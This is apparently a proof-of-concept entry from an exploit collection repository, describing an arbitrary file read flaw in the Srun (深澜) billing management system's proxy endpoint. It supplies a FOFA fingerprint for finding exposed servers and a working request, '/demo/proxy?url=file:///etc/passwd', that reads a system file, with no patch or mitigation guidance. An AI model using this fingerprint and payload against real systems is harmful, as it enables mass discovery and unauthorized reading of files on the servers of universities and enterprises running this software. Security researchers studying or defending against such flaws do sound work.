POC00/深澜计费管理系统proxy存在任意文件读取漏洞.md
2024-07-09 13:51:15 +08:00

17 lines
629 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## 深澜计费管理系统proxy存在任意文件读取漏洞
杭州瀚洋科技有限公司深澜软件是全球领先且企业高端用户最多的认证计费技术厂商之一总部位于中国的杭州。目前全球超过2500家企业选择深澜软件作为其用户认证管理及计费方案其中在中国Top100高校中有60%使用我们的产品。 作为全球认证计费解决方案的领导品牌
## fofa
```
"/js/lib/slimscroll.js"
```
## poc
```
/demo/proxy?url=file:///etc/passwd
```
![image-20240707200736080](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407072007153.png)